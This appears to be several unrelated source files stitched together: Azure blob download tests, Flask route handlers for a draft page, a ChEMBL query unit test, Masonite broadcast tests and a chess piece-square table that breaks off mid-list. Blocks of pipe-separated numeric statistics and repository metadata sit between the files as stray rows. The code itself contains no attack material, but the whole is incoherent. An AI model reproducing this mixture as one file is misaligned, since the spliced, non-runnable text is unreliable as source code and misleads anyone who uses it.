    text_data = self.get_random_text_data(self.config.max_single_get_size + 1)
    blob = self.bsc.get_blob_client(self.container_name, text_blob)
    blob.upload_blob(text_data)
    progress = []

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    stream = blob.download_blob(
        raw_response_hook=callback,
        max_concurrency=2,
        encoding='UTF-8')
    content = stream.readall()

    # Assert
    self.assertEqual(text_data, content)
    self.assert_download_progress(
        len(text_data.encode('utf-8')),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
@GlobalStorageAccountPreparer()
def test_get_blob_to_text_non_parallel(self, resource_group, location, storage_account, storage_account_key):
    """Sequential text download with progress reporting."""
    self._setup(storage_account, storage_account_key)
    text_blob = self._get_blob_reference()
    text_data = self.get_random_text_data(self.config.max_single_get_size + 1)
    blob = self.bsc.get_blob_client(self.container_name, text_blob)
    blob.upload_blob(text_data)
    progress = []

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    stream = blob.download_blob(
        raw_response_hook=callback,
        max_concurrency=1,
        encoding='UTF-8')
    content = stream.readall()

    # Assert
    self.assertEqual(text_data, content)
    # NOTE(review): len(text_data) is a character count; the parallel variant
    # uses len(text_data.encode('utf-8')) — confirm the random text is ASCII-only
    # so both are equal.
    self.assert_download_progress(
        len(text_data),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
@GlobalStorageAccountPreparer()
def test_get_blob_to_text_small(self, resource_group, location, storage_account, storage_account_key):
    """A small (1 KiB) text blob downloads and decodes in a single GET."""
    self._setup(storage_account, storage_account_key)
    blob_data = self.get_random_text_data(1024)
    blob_name = self._get_blob_reference()
    blob = self.bsc.get_blob_client(self.container_name, blob_name)
    blob.upload_blob(blob_data)
    progress = []

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    stream = blob.download_blob(raw_response_hook=callback, encoding='UTF-8')
    content = stream.readall()

    # Assert
    self.assertEqual(blob_data, content)
    self.assert_download_progress(
        len(blob_data),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
@GlobalStorageAccountPreparer()
def test_get_blob_to_text_with_encoding(self, resource_group, location, storage_account, storage_account_key):
    """Round-trip a non-ASCII string through a UTF-16 encoded blob."""
    self._setup(storage_account, storage_account_key)
    text = u'hello 啊齄丂狛狜 world'
    blob_client = self.bsc.get_blob_client(self.container_name, self._get_blob_reference())
    blob_client.upload_blob(text, encoding='utf-16')

    # Act
    downloaded = blob_client.download_blob(encoding='UTF-16').readall()

    # Assert
    self.assertEqual(text, downloaded)
@GlobalStorageAccountPreparer()
def test_get_blob_to_text_with_encoding_and_progress(self, resource_group, location, storage_account, storage_account_key):
    """UTF-16 round-trip with progress reporting."""
    self._setup(storage_account, storage_account_key)
    text = u'hello 啊齄丂狛狜 world'
    blob_name = self._get_blob_reference()
    blob = self.bsc.get_blob_client(self.container_name, blob_name)
    blob.upload_blob(text, encoding='utf-16')

    # Act
    progress = []

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    stream = blob.download_blob(raw_response_hook=callback, encoding='UTF-16')
    content = stream.readall()

    # Assert
    self.assertEqual(text, content)
    # NOTE(review): the blob was uploaded as UTF-16, yet the expected progress
    # total uses the UTF-8 byte length — confirm this is intentional.
    self.assert_download_progress(
        len(text.encode('utf-8')),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
@GlobalStorageAccountPreparer()
def test_get_blob_non_seekable(self, resource_group, location, storage_account, storage_account_key):
    """Sequential download succeeds even when the target stream is non-seekable."""
    self._setup(storage_account, storage_account_key)
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    # Act
    FILE_PATH = 'get_blob_non_seekable.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        non_seekable_stream = StorageGetBlobTest.NonSeekableFile(stream)
        downloader = blob.download_blob(max_concurrency=1)
        read_bytes = downloader.readinto(non_seekable_stream)

    # Assert
    self.assertEqual(read_bytes, len(self.byte_data))
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(self.byte_data, actual)
    self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_non_seekable_parallel(self, resource_group, location, storage_account, storage_account_key):
    """Parallel download into a non-seekable stream must raise ValueError."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    # Act
    FILE_PATH = 'get_blob_non_seekable.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        non_seekable_stream = StorageGetBlobTest.NonSeekableFile(stream)

        # parallel readinto must seek to place chunks; a non-seekable target is rejected
        with self.assertRaises(ValueError):
            downloader = blob.download_blob(max_concurrency=2)
            properties = downloader.readinto(non_seekable_stream)
    self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream_exact_get_size(self, resource_group, location, storage_account, storage_account_key):
    """A blob exactly max_single_get_size downloads correctly to a stream."""
    self._setup(storage_account, storage_account_key)
    blob_name = self._get_blob_reference()
    byte_data = self.get_random_bytes(self.config.max_single_get_size)
    blob = self.bsc.get_blob_client(self.container_name, blob_name)
    blob.upload_blob(byte_data)
    progress = []

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    FILE_PATH = 'blob_to_stream_exact_get_size.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(raw_response_hook=callback, max_concurrency=2)
        properties = downloader.readinto(stream)

    # Assert
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(byte_data, actual)
    self.assert_download_progress(
        len(byte_data),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
    self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_get_blob_exact_get_size(self, resource_group, location, storage_account, storage_account_key):
    """A blob exactly max_single_get_size downloads correctly to bytes."""
    self._setup(storage_account, storage_account_key)
    blob_name = self._get_blob_reference()
    byte_data = self.get_random_bytes(self.config.max_single_get_size)
    blob = self.bsc.get_blob_client(self.container_name, blob_name)
    blob.upload_blob(byte_data)
    progress = []

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    content = blob.download_blob(raw_response_hook=callback).readall()

    # Assert
    self.assertEqual(byte_data, content)
    self.assert_download_progress(
        len(byte_data),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_exact_chunk_size(self, resource_group, location, storage_account, storage_account_key):
    """A blob of exactly one initial get plus one full chunk downloads correctly."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    blob_name = self._get_blob_reference()
    byte_data = self.get_random_bytes(
        self.config.max_single_get_size +
        self.config.max_chunk_get_size)
    blob = self.bsc.get_blob_client(self.container_name, blob_name)
    blob.upload_blob(byte_data)
    progress = []

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    content = blob.download_blob(raw_response_hook=callback).readall()

    # Assert
    self.assertEqual(byte_data, content)
    self.assert_download_progress(
        len(byte_data),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream_with_md5(self, resource_group, location, storage_account, storage_account_key):
    """Parallel download to a stream with per-chunk MD5 validation enabled."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    # Act
    FILE_PATH = 'stream_with_md5.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(validate_content=True, max_concurrency=2)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(read_bytes, len(self.byte_data))
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(self.byte_data, actual)
    self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_with_md5(self, resource_group, location, storage_account, storage_account_key):
    """Full download with validate_content=True still returns the whole payload."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    blob_client = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    # Act
    downloaded = blob_client.download_blob(validate_content=True, max_concurrency=2).readall()

    # Assert
    self.assertEqual(self.byte_data, downloaded)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_range_to_stream_with_overall_md5(self, resource_group, location, storage_account, storage_account_key):
    """Ranged validated download surfaces the blob-level MD5 in properties."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
    # stamp a known (fake) MD5 onto the blob's content settings
    props = blob.get_blob_properties()
    props.content_settings.content_md5 = b'MDAwMDAwMDA='
    blob.set_http_headers(props.content_settings)

    # Act
    FILE_PATH = 'blob_range_to_stream_with_overall_md5.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(offset=0, length=1024, validate_content=True, max_concurrency=2)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(downloader.size, 1024)
    self.assertEqual(read_bytes, 1024)
    self.assertEqual(b'MDAwMDAwMDA=', downloader.properties.content_settings.content_md5)
    self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_range_with_overall_md5(self, resource_group, location, storage_account, storage_account_key):
    """After setting a blob-level MD5, a ranged download exposes it in properties."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
    content = blob.download_blob(offset=0, length=1024, validate_content=True)
    # NOTE(review): the download above and the repeated _setup below look like
    # leftovers from an earlier revision of this test — confirm and remove.
    self._setup(storage_account, storage_account_key)
    props = blob.get_blob_properties()
    props.content_settings.content_md5 = b'MDAwMDAwMDA='
    blob.set_http_headers(props.content_settings)

    # Act
    content = blob.download_blob(offset=0, length=1024, validate_content=True)

    # Assert
    self.assertEqual(content.properties.size, 1024)
    self.assertEqual(b'MDAwMDAwMDA=', content.properties.content_settings.content_md5)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_range_with_range_md5(self, resource_group, location, storage_account, storage_account_key):
    """With no blob-level MD5 set, a ranged validated download reports none."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
    content = blob.download_blob(offset=0, length=1024, validate_content=True)
    # NOTE(review): the download above and the repeated _setup below look like
    # leftovers from an earlier revision of this test — confirm and remove.
    self._setup(storage_account, storage_account_key)
    props = blob.get_blob_properties()
    # clear any blob-level MD5
    props.content_settings.content_md5 = None
    blob.set_http_headers(props.content_settings)

    # Act
    content = blob.download_blob(offset=0, length=1024, validate_content=True)

    # Assert
    self.assertIsNotNone(content.properties.content_settings.content_type)
    self.assertIsNone(content.properties.content_settings.content_md5)
# ------------------------------------------------------------------------------
| 42.071811
| 1,392
| 0.683667
| 4,555
| 39,253
| 5.564654
| 0.059934
| 0.085059
| 0.051643
| 0.083955
| 0.887995
| 0.872687
| 0.854736
| 0.846609
| 0.838955
| 0.83213
| 0
| 0.013287
| 0.219652
| 39,253
| 932
| 1,393
| 42.116953
| 0.814208
| 0.071612
| 0
| 0.739938
| 0
| 0.001548
| 0.074785
| 0.061022
| 0
| 1
| 0
| 0
| 0.117647
| 1
| 0.089783
| false
| 0.003096
| 0.01548
| 0.004644
| 0.113003
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
97d9df6a82d368ce76cd6f3016dbbc3135c2a856
| 5,407
|
py
|
Python
|
copy/python/controller/v_taslak.py
|
koneviahmet/python-cli
|
cb65c95489c5e2a3ec20139be743855f831d0f42
|
[
"MIT"
] | 4
|
2020-07-22T19:20:52.000Z
|
2020-07-31T06:05:07.000Z
|
copy/python/controller/v_taslak.py
|
koneviahmet/python-cli
|
cb65c95489c5e2a3ec20139be743855f831d0f42
|
[
"MIT"
] | null | null | null |
copy/python/controller/v_taslak.py
|
koneviahmet/python-cli
|
cb65c95489c5e2a3ec20139be743855f831d0f42
|
[
"MIT"
] | null | null | null |
from __main__ import app, render_template, request, session, make_response
from library.lUser import lUser
from library.yetki import Yetki
from model.taslak import Taslak
# example usage of the permission (yetki) check
@app.route('/v_taslak/yetki')
def v_taslak_yetki():
    """Demo endpoint: report whether permission 'denemeYetki' is granted."""
    has_permission = Yetki(3).yetkiDenetle('denemeYetki')
    return "yetki var" if has_permission else "yetki yok"
@app.route('/v_taslak')
def v_taslak():
    """Render the draft (taslak) landing page."""
    data = {'deneme': "deneme"}
    # each section template receives the accumulated data dict, in page order
    sections = (
        ('header', 'klasik/header/header.html'),
        ('menu', 'klasik/menu/menu.html'),
        ('content', 'klasik/content/taslak/anasayfa.html'),
        ('footer', 'klasik/footer/footer.html'),
    )
    for key, template in sections:
        data[key] = render_template(template, data = data)
    return render_template('klasik/index.html', data = data)
@app.route('/v_taslak/taslak_list')
def v_taslak_list():
    """Render the list of all drafts; requires a logged-in user."""
    data = dict()
    hataSayfa = '404.html'

    userInfo = lUser().userInfo()
    data['userInfo'] = userInfo
    if not userInfo:
        # not logged in -> show the permission error page instead
        data['hata'] = "hata"
        hataSayfa = 'yetki.html'

    # error check
    if 'hata' in data:
        data['content'] = render_template('klasik/hata/' + hataSayfa, data = data)
    else:
        # no error: load all drafts and render the full page sections
        data['allTaslak'] = Taslak.query.all()
        data['header'] = render_template('klasik/header/header.html', data = data)
        data['menu'] = render_template('klasik/menu/menu.html', data = data)
        data['content'] = render_template('klasik/content/taslak/taslak_list.html', data = data)
        data['footer'] = render_template('klasik/footer/footer.html', data = data)
    return render_template('klasik/index.html', data = data)
@app.route('/v_taslak/taslak_detay/<taslakId>')
def v_taslak_detay(taslakId):
    """Render the detail page for a single draft; errors on missing login or id."""
    data = dict()
    hataSayfa = '404.html'

    userInfo = lUser().userInfo()
    data['userInfo'] = userInfo
    if not userInfo:
        # not logged in -> show the permission error page instead
        data['hata'] = "hata"
        hataSayfa = 'yetki.html'

    # load the requested draft record
    taslakInfo = Taslak.query.filter_by(taslak_id=str(taslakId)).first()
    data['taslakInfo'] = taslakInfo
    if not taslakInfo:
        data['hata'] = "taslak bulunamadı."

    # error check
    if 'hata' in data:
        data['content'] = render_template('klasik/hata/' + hataSayfa, data = data)
    else:
        data['header'] = render_template('klasik/header/header.html', data = data)
        data['menu'] = render_template('klasik/menu/menu.html', data = data)
        data['content'] = render_template('klasik/content/taslak/taslak_detay.html', data = data)
        data['footer'] = render_template('klasik/footer/footer.html', data = data)
    return render_template('klasik/index.html', data = data)
@app.route('/v_taslak/taslak_duzenle/<taslakId>')
def v_taslak_duzenle(taslakId):
    """Render the edit page for a single draft.

    Shows the permission error page when the visitor is not logged in, and —
    consistent with v_taslak_detay — an error page when the draft id does not
    exist (previously the edit template was rendered with taslakInfo=None).
    """
    data = dict()
    hataSayfa = '404.html'

    userInfo = lUser().userInfo()
    data['userInfo'] = userInfo
    if not userInfo:
        # not logged in -> show the permission error page instead
        data['hata'] = "hata"
        hataSayfa = 'yetki.html'

    # load the draft being edited
    taslakInfo = Taslak.query.filter_by(taslak_id=str(taslakId)).first()
    data['taslakInfo'] = taslakInfo
    if not taslakInfo:
        data['hata'] = "taslak bulunamadı."

    # error check
    if 'hata' in data:
        data['content'] = render_template('klasik/hata/' + hataSayfa, data = data)
    else:
        data['header'] = render_template('klasik/header/header.html', data = data)
        data['menu'] = render_template('klasik/menu/menu.html', data = data)
        data['content'] = render_template('klasik/content/taslak/taslak_duzenle.html', data = data)
        data['footer'] = render_template('klasik/footer/footer.html', data = data)
    return render_template('klasik/index.html', data = data)
@app.route('/v_taslak/taslak_ara')
def v_taslak_ara():
    """Render the draft search page; requires a logged-in user."""
    data = dict()
    hataSayfa = '404.html'

    userInfo = lUser().userInfo()
    data['userInfo'] = userInfo
    if not userInfo:
        # not logged in -> show the permission error page instead
        data['hata'] = "hata"
        hataSayfa = 'yetki.html'

    # error check
    if 'hata' in data:
        data['content'] = render_template('klasik/hata/' + hataSayfa, data = data)
    else:
        # no error: render the full page sections
        data['header'] = render_template('klasik/header/header.html', data = data)
        data['menu'] = render_template('klasik/menu/menu.html', data = data)
        data['content'] = render_template('klasik/content/taslak/taslak_ara.html', data = data)
        data['footer'] = render_template('klasik/footer/footer.html', data = data)
    return render_template('klasik/index.html', data = data)
# NOTE(review): original comment said "member profile page" — likely stale copy-paste
@app.route('/v_taslak/taslak_kaydet')
def v_taslak_kaydet():
    """Render the draft create/save page; requires a logged-in user."""
    data = dict()
    hataSayfa = '404.html'

    userInfo = lUser().userInfo()
    data['userInfo'] = userInfo
    if not userInfo:
        # not logged in -> show the permission error page instead
        data['hata'] = "hata"
        hataSayfa = 'yetki.html'

    # error check
    if 'hata' in data:
        data['content'] = render_template('klasik/hata/' + hataSayfa, data = data)
    else:
        data['header'] = render_template('klasik/header/header.html', data = data)
        data['menu'] = render_template('klasik/menu/menu.html', data = data)
        data['content'] = render_template('klasik/content/taslak/taslak_kaydet.html', data = data)
        data['footer'] = render_template('klasik/footer/footer.html', data = data)
    return render_template('klasik/index.html', data = data)
| 31.619883
| 99
| 0.64361
| 649
| 5,407
| 5.246533
| 0.107858
| 0.13627
| 0.20558
| 0.084582
| 0.838179
| 0.832012
| 0.832012
| 0.832012
| 0.832012
| 0.832012
| 0
| 0.003737
| 0.208064
| 5,407
| 170
| 100
| 31.805882
| 0.791453
| 0.040503
| 0
| 0.720721
| 0
| 0
| 0.276029
| 0.148348
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063063
| false
| 0
| 0.036036
| 0
| 0.171171
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3f60ad3c772ebf7823553aca5321a2824b572422
| 2,142
|
py
|
Python
|
code/reasoningtool/tests/QueryChEMBLTests.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 31
|
2018-03-05T20:01:10.000Z
|
2022-02-01T03:31:22.000Z
|
code/reasoningtool/tests/QueryChEMBLTests.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 1,774
|
2018-03-06T01:55:03.000Z
|
2022-03-31T03:09:04.000Z
|
code/reasoningtool/tests/QueryChEMBLTests.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 19
|
2018-05-10T00:43:19.000Z
|
2022-03-08T19:26:16.000Z
|
import unittest
from QueryChEMBL import QueryChEMBL as QC
class QueryChEMBLTestCase(unittest.TestCase):
    """Tests for QueryChEMBL lookups.

    NOTE(review): these appear to hit the live ChEMBL web service via the
    QueryChEMBL wrapper — confirm before running in CI.
    """

    # Expected UniProt-target -> confidence mapping for clothiapine
    # (ChEMBL id CHEMBL304902).  The drug-name lookup and the ChEMBL-id
    # lookup must agree, so both tests share this single constant instead
    # of duplicating the 20-entry dict.
    CLOTHIAPINE_TARGETS = {
        'P21728': 0.99999999997, 'P21918': 0.9999999824,
        'P14416': 0.99996980427, 'P35367': 0.99996179618,
        'P08913': 0.99973447457, 'P18089': 0.99638618971,
        'P21917': 0.99500274146, 'P28335': 0.98581821496,
        'P18825': 0.97356918354, 'P28223': 0.96867458111,
        'Q9H3N8': 0.83028164473, 'P34969': 0.39141293908,
        'P41595': 0.31891025293, 'P08173': 0.18274693348,
        'P11229': 0.16526971365, 'P04637': 0.12499267788,
        'P35462': 0.11109632984, 'P10635': 0.09162534744,
        'P25100': 0.0855003718, 'P06746': 0.04246537619,
    }

    def test_get_target_uniprot_ids_for_drug(self):
        """Drug-name lookup returns the known clothiapine target dict."""
        ret_dict = QC.get_target_uniprot_ids_for_drug('clothiapine')
        self.assertDictEqual(ret_dict, self.CLOTHIAPINE_TARGETS)

    def test_get_chembl_ids_for_drug(self):
        """Drug-name -> ChEMBL-id lookup returns exactly CHEMBL304902."""
        ret_set = QC.get_chembl_ids_for_drug('clothiapine')
        known_set = {'CHEMBL304902'}
        self.assertSetEqual(ret_set, known_set)

    def test_get_target_uniprot_ids_for_chembl_id(self):
        """ChEMBL-id lookup returns the same targets as the drug-name path."""
        ret_dict = QC.get_target_uniprot_ids_for_chembl_id('CHEMBL304902')
        self.assertDictEqual(ret_dict, self.CLOTHIAPINE_TARGETS)
# Allow running this test module directly (python QueryChEMBLTests.py).
if __name__ == '__main__':
    unittest.main()
| 45.574468
| 74
| 0.590103
| 219
| 2,142
| 5.52968
| 0.328767
| 0.029728
| 0.052849
| 0.062758
| 0.848885
| 0.78943
| 0.782824
| 0.721718
| 0.721718
| 0.663914
| 0
| 0.448819
| 0.288515
| 2,142
| 46
| 75
| 46.565217
| 0.345801
| 0
| 0
| 0.628571
| 0
| 0
| 0.137255
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 1
| 0.085714
| false
| 0
| 0.057143
| 0
| 0.171429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
58b758e48bb642bf4d6e205617c386b59058caf8
| 3,536
|
py
|
Python
|
tests/broadcasts/test_sockets.py
|
rickavmaniac/masonite
|
cf085a806123ef267ef0d07d828dcca0a6d1e6b2
|
[
"MIT"
] | 1
|
2022-02-24T06:21:18.000Z
|
2022-02-24T06:21:18.000Z
|
tests/broadcasts/test_sockets.py
|
rickavmaniac/masonite
|
cf085a806123ef267ef0d07d828dcca0a6d1e6b2
|
[
"MIT"
] | null | null | null |
tests/broadcasts/test_sockets.py
|
rickavmaniac/masonite
|
cf085a806123ef267ef0d07d828dcca0a6d1e6b2
|
[
"MIT"
] | null | null | null |
import os
import unittest
from src.masonite.drivers import BroadcastPusherDriver
from src.masonite.managers import BroadcastManager
from src.masonite.testing import TestCase
class TestSockets(TestCase):
    """Integration tests for the broadcast drivers (Pusher, Ably, PubNub).

    Each test requires real service credentials and is skipped when the
    corresponding *_SECRET environment variable is absent.
    """

    def setUp(self):
        super().setUp()
        self.container.bind('BroadcastPusherDriver', BroadcastPusherDriver)
        self.container.bind('BroadcastManager', BroadcastManager)
        # skip tests depending on drivers keys presence
        self.run_pusher_tests = bool(os.getenv('PUSHER_SECRET'))
        self.run_ably_tests = bool(os.getenv('ABLY_SECRET'))
        self.run_pubnub_tests = bool(os.getenv('PUBNUB_SECRET'))

    def _assert_driver_broadcasts(self, driver, single_channel, single_dict, channels):
        """Bind *driver* as 'Broadcast' and verify its channel/ssl contract.

        The three public tests below were byte-for-byte copies of each other
        apart from the driver name and channel names; this helper holds the
        shared assertions.

        driver: manager driver key ('pusher', 'ably', 'pubnub').
        single_channel: channel name used for the single-channel sends.
        single_dict: dict payload expected to round-trip unchanged.
        channels: list of two channel names for the multi-channel sends.
        """
        self.container.bind('Broadcast', self.container.make('BroadcastManager').driver(driver))
        self.assertIsNotNone(self.container.make('BroadcastManager'))
        # A plain string payload is wrapped into {'message': ...}; a dict
        # payload is passed through unchanged.
        self.assertEqual(self.container.make('Broadcast').channel(single_channel, 'from driver'), {'message': 'from driver'})
        self.assertEqual(self.container.make('Broadcast').channel(single_channel, single_dict), single_dict)
        self.assertEqual(self.container.make('Broadcast').channel(channels, {'message': 'dictionary'}), {'message': 'dictionary'})
        self.assertEqual(self.container.make('Broadcast').channel(channels, {'message': 'dictionary'}, 'test-event'), {'message': 'dictionary'})
        self.assertTrue(self.container.make('Broadcast').ssl(True).ssl_message)

    def test_broadcast_loads_into_container(self):
        if not self.run_pusher_tests:
            self.skipTest("require Pusher keys")
        self._assert_driver_broadcasts('pusher', 'random', {'message': 'dictionary'}, ['channel1', 'channel2'])

    def test_broadcast_loads_into_container_with_ably(self):
        if not self.run_ably_tests:
            self.skipTest("require Ably keys")
        self._assert_driver_broadcasts('ably', 'test-channel', {'message': 'from driver'}, ['channel-1', 'channel-2'])

    def test_broadcast_loads_into_container_with_pubnub(self):
        if not self.run_pubnub_tests:
            self.skipTest("require PubNub keys")
        self._assert_driver_broadcasts('pubnub', 'test-channel', {'message': 'from driver'}, ['channel-1', 'channel-2'])
| 65.481481
| 162
| 0.697115
| 385
| 3,536
| 6.314286
| 0.150649
| 0.139037
| 0.146853
| 0.160428
| 0.754422
| 0.734677
| 0.720691
| 0.720691
| 0.715755
| 0.715755
| 0
| 0.003905
| 0.130939
| 3,536
| 53
| 163
| 66.716981
| 0.787179
| 0.012726
| 0
| 0.325581
| 0
| 0
| 0.284895
| 0.006019
| 0
| 0
| 0
| 0
| 0.418605
| 1
| 0.093023
| false
| 0
| 0.116279
| 0
| 0.232558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58f4cd23e5825d5db1dbaded94769e239602ba35
| 2,843
|
py
|
Python
|
ChessAI/ChessPlayer/BotPlayer/figure_cost.py
|
PavelLebed20/chess_classic
|
72f7d08cadae8db9c65d61411bcdc8c79bfa04c3
|
[
"Apache-2.0"
] | 1
|
2019-06-04T11:08:55.000Z
|
2019-06-04T11:08:55.000Z
|
ChessAI/ChessPlayer/BotPlayer/figure_cost.py
|
PavelLebed20/chess_classic
|
72f7d08cadae8db9c65d61411bcdc8c79bfa04c3
|
[
"Apache-2.0"
] | 115
|
2019-03-02T08:02:50.000Z
|
2019-06-02T16:28:00.000Z
|
ChessAI/ChessPlayer/BotPlayer/figure_cost.py
|
PavelLebed20/chess_classic
|
72f7d08cadae8db9c65d61411bcdc8c79bfa04c3
|
[
"Apache-2.0"
] | null | null | null |
# 8x8 piece-square tables: a positional bonus/penalty for each board square,
# added to the material value of the piece standing there.  Values match the
# widely used "simplified evaluation function" tables (scaled by 1/10).
# Row/column orientation (which rank is row 0, whose point of view) is not
# shown here — presumably row 0 is the far rank from the side being scored;
# TODO confirm against the evaluator that indexes these tables.

# Pawns: reward central advances, penalize the squares in front of an
# uncastled king (the -2.0 pair on the second-to-last row).
pawn_cost = [
    [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
    [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0],
    [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0],
    [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5],
    [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0],
    [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5],
    [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5],
    [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]]

# Rooks: small bonus on the 7th rank, slight penalty for the a/h files,
# bonus for the central home squares (castled/centralized rook).
rook_cost = [
    [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
    [0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5],
    [-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],
    [-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],
    [-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],
    [-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],
    [-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],
    [0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0]
]

# Knights: strongly prefer the center, heavily penalize rim and corners.
knight_cost = [
    [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0],
    [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0],
    [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0],
